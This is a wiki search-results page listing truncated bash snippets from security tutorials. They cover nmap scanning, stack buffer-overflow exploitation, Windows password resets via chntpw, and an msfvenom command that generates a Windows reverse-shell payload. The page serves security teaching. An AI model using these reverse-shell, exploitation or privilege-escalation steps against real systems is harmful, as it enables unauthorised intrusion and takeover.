bash

Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Helpful NMAP scanner commands
12 Treffer, Zuletzt geändert:
ommand Set ===== ==== Discover Hosts ==== <code bash> export IPRANGE='172.16.0.0/16' nmap -e tun0 -sn ... $IPRANGE </code> ==== Parse Results ==== <code bash> grep Up pingscan.gnmap | awk '{print$2}' > 172_1... s.txt </code> ==== Discover Services ==== <code bash> nmap -v -sSV -A -O -iL 172_16_ping_ips.txt </code> ==== Discover more Hosts ==== <code bash> nmap -PE -PS80,443,3389 -PP -PU40125,161 -PA21 -
Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog
12 Treffer, Zuletzt geändert:
docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python3 -m ... ion on Github in the Dependencies section. <code bash> /dir/to/socat TCP-LISTEN:2323,reuseaddr,fork EXE... e check where the path to the ''libc'' is: <code bash> ldd bof-part3 linux-vdso.so.1 (0x00007ff... find the offset for ''write()'' function: <code bash> readelf -s /lib/x86_64-linux-gnu/libc.so.6 | gre
Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog
10 Treffer, Zuletzt geändert:
ithub.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.git ~/p... d so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomize_va_... return 0; } </code> \\ \\ === Compile === <code bash> gcc -fno-stack-protector -z execstack bof.c -o b... ugger and generate a 200-character string: <code bash> gdb -q vulnerable pattern_create 200 in.bin r <
Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
9 Treffer, Zuletzt geändert:
|kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < in.txt... verflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deac... as base address as in the examples above. <code bash> gcc -fno-stack-protector -no-pie bof-part2.c -o ... s, we start ropper and display the gadgets <code bash> ropper --file bof-part2 ... 0x000000000040116a:
Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
6 Treffer, Zuletzt geändert:
==== Now we can install ''chntpw'' using: <code bash> sudo apt install chntpw </code> \\ \\ ==== Find ... We are looking for the Windows partition. <code bash> sudo sfdisk -l </code> {{it-security:blog:scree... tion and create it in our $HOME directory. <code bash> mkdir ~/win </code> We then mount the partition. <code bash> sudo mount /dev/sda3 ~/win </code> Now we navig
Shellcode Injection Part 1 @en:it-security:blog
3 Treffer, Zuletzt geändert:
| | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.... rst we create the shellcode in raw format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.... ll working}}] \\ \\ ===== Repository ===== <code bash> git clone https://github.com/psycore8/nosoc-shel
nmap SMBv1 Scan via Script
1 Treffer, Zuletzt geändert:
s" end end </code> ===== Start scan ===== <code bash> nmap -p139,445 --script smbv1 <target> </code>